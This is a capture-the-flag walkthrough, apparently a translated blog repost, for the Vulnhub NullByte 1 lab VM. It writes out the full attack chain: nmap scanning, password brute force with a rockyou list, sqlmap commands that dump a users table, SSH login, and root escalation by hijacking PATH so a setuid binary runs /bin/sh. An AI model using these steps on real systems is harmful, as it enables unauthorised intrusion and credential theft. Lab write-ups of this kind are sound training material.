Vulnhub drone: NULLBYTE_ 1

Language 2023-09-16 22:33:18 views: null

introduce

Series: NullByte (1 unit in this series)
Release date: August 1, 2015
Difficulty: Beginner
Running environment: Virtualbox
Goal: Obtain Root permissions
Learning:

  • nmap missing scan script
  • Brute force cracking
  • SQL injection
  • Environment variable privilege escalation

Target address: https://www.vulnhub.com/entry/nullbyte-1,126/

collect message

netdiscover host discovery

sudo netdiscover -i eth1 -r 192.168.56.0/24

Host information detection
found that SSH is running on port 777

nmap -p- 192.168.56.109
nmap -p 80,111,777,56412 -A 192.168.56.109
nmap -p 80,111,777,56412 --script=vuln 192.168.56.109

image.png

Website detection

When you open the website, you will see an image, and the image address is in the page source code.
image.png
Directory blasting didn't find any valuable information, so let's take a look at the picture first, and found a string of characters.

wget http://192.168.56.109/main.gif
exiftool main.gif

image.png
After trying it, I found that this is a website directory, and it seems that a password is required to log in.
image.png

Brute force cracking

Use BurpSuite for brute force cracking. The dictionary selected is rockyou, but this dictionary is too large, so I used \SecLists-2023.1\Passwords\Leaked-Databases\rockyou-70.txt in SecLists to crack the password:
elite
image.png

SQL injection

After logging in, it is found that there is SQL injection. After checking, it is found that there is no cookie. Then it is easy to handle. Just run sqlmap.

sqlmap -u "http://192.168.56.109/kzMb5nVYJw/420search.php?usrtosearch=1" --dbs
sqlmap -u "http://192.168.56.109/kzMb5nVYJw/420search.php?usrtosearch=1" -D seth --tables
sqlmap -u "http://192.168.56.109/kzMb5nVYJw/420search.php?usrtosearch=1" -D seth -T users --columns
sqlmap -u "http://192.168.56.109/kzMb5nVYJw/420search.php?usrtosearch=1" -D seth -T users --dump

image.png
image.png
This ciphertext cannot be decoded directly. After trying it, I found that it can be base64 decoded. Finally, the corresponding plaintext is: omega
image.png
image.png

SSH login

image.png

Elevate privileges

Based on the command line history, a suspicious executable file was easily found. Try running and find that this file will call other files
image.png
image.png

Way 1

Duplicate a terminal and tamper with environment variables

./procwatch
cp /bin/sh /tmp/ps
echo $PATH
export PATH=/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
./procwatch

image.png

Way 2

Create a new terminal locally and modify the environment variables

echo "/bin/sh" > ps
chmod 777 ps
echo $PATH
export PATH=.:$PATH
echo $PATH
./procwatch

image.png

Guess you like

Origin blog.csdn.net/weixin_44288604/article/details/132410213
Recommended
Ranking
#2019110700005
What materials and procedures are required for patent transfer
What is the blockchain Ethereum triplet state root transaction root receipt root
Front-end study notes 04 --- About the insertion of html pictures and videos
Documents required for the filing of WeChat Mini Programs in special industries, the filing process of WeChat Mini Programs in special industries, how to file WeChat Mini Programs in special industries
2017 Qingdao-site tournament I The Squared Mosquito Coil
[BZOJ3165][HEOI2013]Segment (line segment tree without marking)
Kettle series: KettleEasyExpand, an open source Kettle universal plugin by Ma Jinju
The latest tutorial on making framework for iOS
DAX Section 6: Statistical Functions
Daily
More
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)

Code World

© 2018 codetd.com